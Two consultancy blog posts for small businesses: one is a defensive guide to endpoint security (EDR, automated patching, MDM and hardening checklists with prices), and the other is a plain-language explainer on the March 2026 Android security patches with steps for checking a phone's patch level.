TL;DR

Most cyberattacks breach businesses through unpatched laptops and unmanaged phones. Deploy EDR on every endpoint, automate patching within 48 hours for critical updates, and enforce MDM with encryption and remote wipe — all aligned with the ASD Essential Eight and CIS Benchmarks.​‌‌​​‌​‌‍​‌‌​‌‌‌​‍​‌‌​​‌​​‍​‌‌‌​​​​‍​‌‌​‌‌‌‌‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌‌​‌​​‍​​‌​‌‌​‌‍​‌‌​‌​​​‍​‌‌​​​​‌‍​‌‌‌​​‌​‍​‌‌​​‌​​‍​‌‌​​‌​‌‍​‌‌​‌‌‌​‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌​​‌‌‌‍​​‌​‌‌​‌‍​‌‌​​​‌‌‍​‌‌​‌​​​‍​‌‌​​‌​‌‍​‌‌​​​‌‌‍​‌‌​‌​‌‌‍​‌‌​‌‌​​‍​‌‌​‌​​‌‍​‌‌‌​​‌‌‍​‌‌‌​‌​​‍​​‌​‌‌​‌‍​‌‌​​​‌​‍​‌‌‌​‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌​​‌​‌‍​‌‌‌​​‌‌‍​‌‌‌​​‌‌

Why Endpoints Are Your Biggest Risk

Attackers do not break into data centers first. They target the laptops, desktops, and smartphones your staff use every day. A 2024 IBM Security report found that the average cost of a data breach caused by compromised endpoints exceeds USD $4.88 million globally. For Australian SMBs, the recovery cost and downtime can be fatal. The good news: most of these entry points can be locked down in a single week.

Deploy EDR or XDR on Every Endpoint

EDR (Endpoint Detection and Response) monitors device behavior in real time. XDR (Extended Detection and Response) adds identity and cloud telemetry. For a typical SMB, EDR is sufficient.​‌‌​​‌​‌‍​‌‌​‌‌‌​‍​‌‌​​‌​​‍​‌‌‌​​​​‍​‌‌​‌‌‌‌‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌‌​‌​​

‍​​‌​‌‌​‌‍​‌‌​‌​​​‍​‌‌​​​​‌‍​‌‌‌​​‌​‍​‌‌​​‌​​‍​‌‌​​‌​‌‍​‌‌​‌‌‌​‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌​​‌‌‌‍​​‌​‌‌​‌‍​‌‌​​​‌‌‍​‌‌​‌​​​‍​‌‌​​‌​‌‍​‌‌​​​‌‌‍​‌‌​‌​‌‌‍​‌‌​‌‌​​‍​‌‌​‌​​‌‍​‌‌‌​​‌‌‍​‌‌‌​‌​​‍​​‌​‌‌​‌‍​‌‌​​​‌​‍​‌‌‌​‌​‌‍​‌‌‌​​‌‌‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌​​‌​‌‍​‌‌‌​​‌‌‍​‌‌‌​​‌‌

Specific tools to evaluate this week:

  • Microsoft Defender for Endpoint — included in Microsoft 365 Business Premium or approximately $3 per user per month standalone. Best for Windows-heavy shops already in the Microsoft ecosystem.
  • CrowdStrike Falcon Go — cloud-native, roughly $8 per endpoint per month. Strong threat intelligence and managed response options.
  • SentinelOne Singularity — autonomous rollback and Storyline™ forensics, generally $10–$15 per endpoint per month.

Action plan: Install agents across all endpoints by end of day two. Enable tamper protection so users cannot disable the software. Route alerts to a dedicated admin mailbox or SIEM. This satisfies detection and incident response requirements under the ASD Essential Eight maturity model.

Automate Patch Management Before Next Tuesday

The ASD Essential Eight explicitly requires patching applications and operating systems—critical patches within 48 hours and high-risk patches within two weeks. Manual patching fails because people forget.

Tools to automate it:

  • Windows Update for Business — free, built into Windows Pro/Enterprise. Configure update rings via Group Policy or Intune.
  • Automox — cloud-native cross-platform patching, roughly $4 per endpoint per month.
  • PDQ Deploy — on-prem Windows patching and software deployment, around $500 per year per administrator license.

Action plan: Enable automatic OS updates. Force browser, PDF reader, and Office patches first—these are the most exploited targets. Set a test ring of two devices to validate before broad rollout. This directly maps to the ASD Essential Eight controls for patch applications and patch operating systems, and supports user application hardening by ensuring legacy versions are removed.

Roll Out MDM for Laptops, Desktops, and Mobile

If a device holds company email or customer data, it must be managed. Mobile Device Management (MDM) enforces encryption, screen locks, strong PINs, remote wipe, and VPN or Wi-Fi profiles.

Tools to evaluate:

  • Microsoft Intune — approximately $8.80 per user per month standalone; often bundled with Microsoft 365 Business Premium. Manages Windows, macOS, iOS, and Android.
  • Jamf Pro — roughly $4 per Apple device per month. Ideal if your fleet is Mac/iPhone heavy.

Action plan: Enroll every device before Friday. Push a configuration profile that mandates BitLocker (Windows) or FileVault (Mac) encryption. Require a 6-digit PIN or biometric unlock. For BYOD phones, use a work profile/container so you can wipe company data without touching personal photos. Disable app sideloading to block unofficial APKs.

Quick-Win Hardening Checklist for Every Device

Use this checklist alongside the CIS Benchmarks for Windows 11 and macOS (free PDFs from CIS):

Laptops and Desktops

  • Remove local admin rights from daily-use accounts.
  • Enable host firewall and disable unnecessary services.
  • Disable USB autoplay and restrict removable storage if not required.
  • Apply CIS Benchmark Level 1 settings—they are practical and do not break business workflows.
  • Ensure EDR is installed, updating, and reporting tamper alerts.

Mobile Devices

  • Enable Find My Device (Android) or Find My (Apple).
  • Enforce OS updates within 14 days via MDM policy.
  • Disable Bluetooth and Wi-Fi when not in use on travel devices.
  • Restrict cloud backup to approved corporate tenants only.

This checklist supports ASD Essential Eight user application hardening by restricting macros, browser add-ons, and default credentials attackers love to exploit.

What It Costs for a 25-Device Fleet

Realistic per-month SMB pricing for 25 endpoints:

  • EDR: $75–$375
  • MDM: $100–$220 (Intune or Jamf)
  • Patching: $0–$100 (WUfB is free; Automox adds cost)
  • Total: roughly $175–$595 per month

Context: this is often less expensive than one hour of ransomware-induced downtime or a single Notifiable Data Breaches scheme report to the OAIC.

FAQ

What is the difference between antivirus and EDR? Antivirus scans files for known signatures. EDR monitors behavior in real time—such as PowerShell spawning from a Word document—and can automatically isolate the device before damage spreads.

Can a small business use free tools instead? Microsoft Defender Antivirus is a capable free baseline, but centralized alerting, automated investigation, and MDM enforcement require paid platforms. Free solutions become expensive when you miss an alert at 2 a.m.

How long does a typical rollout take? MDM enrollment can be completed in a few hours via email invites. EDR deployment usually takes one to two days across a 25-device fleet. Patching policies can be live the same day you configure them.

Do we need MDM if staff use personal phones for email? Yes. Use containerized work profiles through Intune or Google Workspace MDM. This isolates corporate email and calendar data and allows remote wipe of the work container without affecting personal photos or apps.

Conclusion

You do not need a six-month security transformation. Pick one layer and execute it this week: deploy EDR to every laptop, enable automated patching on all endpoints, or enroll every mobile device into MDM. Use the ASD Essential Eight as your maturity roadmap and the CIS Benchmarks as your technical standard. Start with the devices that hold customer data and financial access—they are the ones attackers want most.

Ready to close the gaps? Visit consult.lil.business for a free cybersecurity assessment.

References

  1. Australian Cyber Security Centre — Essential Eight Maturity Model
  2. Center for Internet Security — CIS Benchmarks
  3. National Institute of Standards and Technology — Cybersecurity Framework

Your Work Phone Just Became an Unlocked Door — How to Check if It's Been Fixed

Explained Like You're 10

TL;DR

  • Google just fixed 129 security holes in Android phones — including one that hackers are already using right now [1]
  • If your staff use Android phones to check work email or access business systems, an unpatched phone is like leaving the back door to your business unlocked
  • Checking and fixing this takes about 2 minutes per phone

The Hole in Your Phone

Imagine every phone has thousands of tiny windows. Most are nailed shut. Every so often, someone finds a window that isn't — and before it gets fixed, they can squeeze through it to get inside.

That's what a security vulnerability is.

In March 2026, Google found — and fixed — 129 of these unlocked windows in Android phones [1]. That's a lot at once.

Two of them are the most serious:

The one already being used by hackers: There's a flaw in the graphics chip used by many Android phones (made by a company called Qualcomm). Hackers have already figured out how to use this flaw to get inside certain phones [1][2]. Google has confirmed real attacks are happening right now.

The one that needs no tapping or clicking: There's a second flaw so serious that a hacker could break into a phone just because it's connected to the internet — no dodgy link, no suspicious attachment, nothing. Just "phone exists on the internet, phone gets hacked" [1].

Why Your Work Phone Is Your Business's Problem

Here is the part that surprises a lot of business owners.

When Sarah from your team uses her personal Android phone to check her work email or log into your accounting software — her phone is now a door into your business.

It's like if your staff member kept the office Wi-Fi password on a sticky note in their wallet. If someone steals the wallet, they can get into your office. In the same way, if a hacker gets into a phone that's logged into your business systems, they can reach your business data.

Most businesses are really careful about keeping their office computers updated. Very few think about the phones.

The 2-Minute Check

Here is how to check if any phone is protected.

On any Android phone:

  1. Open Settings
  2. Scroll down to About Phone
  3. Tap Android Version (or Software Information on Samsung)
  4. Look for Android Security Patch Level

If the date shown is March 2026 or later — protected.

If it shows February 2026 or earlier — still at risk. (Update needed)

How to Update

On Android: Settings → System → System Update → Check for Updates

If an update is available, install it. Takes 10–15 minutes and a restart.

If no update is available yet: Some phone brands are slower to release Google's patches. If a work phone can't get the March update and it has access to your business systems — it's worth temporarily removing that access until it can be updated. This sounds strict, but it's the same thinking as "don't leave the front door unlocked just because the locksmith is busy."

The Bigger Picture for Your Business

Your business probably has a rule about keeping computers updated. This month is a good reminder that phones need the same treatment.

Here's a simple rule that works well for small businesses:

If a device accesses business systems, it needs to be running the latest security update — or it doesn't get access.

You don't need expensive software for this. You just need to check once a month, the same way you might check the locks before you leave the office.

The Australian Signals Directorate (Australia's cyber safety agency) consistently highlights outdated mobile software as one of the most common ways businesses get compromised [4].

FAQ

If your phone manufacturer has stopped releasing security updates (usually after 3–5 years for most brands), your phone will never get this fix. If that phone is accessing your business email or systems, consider replacing it — or using a different device for business that can receive updates. Google Pixel phones receive 7 years of updates now, which makes them a solid business choice.

No — this is specific to Android phones. iPhones have their own separate security updates, which Apple releases quickly. The same principle applies though: keep your iPhone updated too.

Focus on the ones that access the most sensitive systems first — whoever handles finance, customer data, or admin access. A quick message asking them to screenshot their security patch level screen takes 5 minutes for your whole team.

It's not that Android suddenly became a lot more vulnerable — it's that Google bunches up patches and releases them monthly. Some of these fixes were in development for months. The number looks scary but most are low-severity issues that would be hard to exploit in practice. The two we highlighted are the ones that genuinely need urgent attention.

Once a month is enough. Google releases security updates monthly. Set a reminder on the first Monday of each month to quickly confirm all work-accessed devices are current.

References

[1] Google, "Android Security Bulletin—March 2026," Android Open Source Project, Mar. 2026. [Online]. Available: https://source.android.com/docs/security/bulletin/2026/2026-03-01

[2] The Hacker News, "Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited," The Hacker News, Mar. 3, 2026. [Online]. Available: https://thehackernews.com/2026/03/google-confirms-cve-2026-21385-in.html

[3] Qualcomm, "March 2026 Security Bulletin," Qualcomm Technologies, Mar. 2026. [Online]. Available: https://docs.qualcomm.com/securitybulletin/march-2026-bulletin.html

[4] Australian Signals Directorate, "ASD Annual Cyber Threat Report 2023-24," Australian Signals Directorate, 2024. [Online]. Available: https://www.cyber.gov.au/about-us/view-all-content/reports-and-statistics/asd-cyber-threat-report-july-2023-june-2024

[5] NIST, "SP 800-124 Rev. 2: Guidelines for Managing the Security of Mobile Devices in the Enterprise," National Institute of Standards and Technology, 2023. [Online]. Available: https://csrc.nist.gov/publications/detail/sp/800-124/rev-2/final

[6] CISA, "Mobile Device Best Practices," Cybersecurity and Infrastructure Security Agency, 2024. [Online]. Available: https://www.cisa.gov/resources-tools/resources/mobile-device-best-practices

[7] IBM Security, "Cost of a Data Breach Report 2025," IBM, 2025. [Online]. Available: https://www.ibm.com/reports/data-breach

[8] Verizon, "2025 Data Breach Investigations Report," Verizon Business, 2025. [Online]. Available: https://www.verizon.com/business/resources/reports/dbir/

Want someone to check whether your business's phones and devices are properly secured? Book a free 30-minute review with lilMONSTER — we'll look at what's accessible and give you a simple checklist to fix the gaps.

Ready to strengthen your security?

Talk to lilMONSTER. We assess your risks, build the tools, and stay with you after the engagement ends. No clipboard-and-leave consulting.

Get a Free Consultation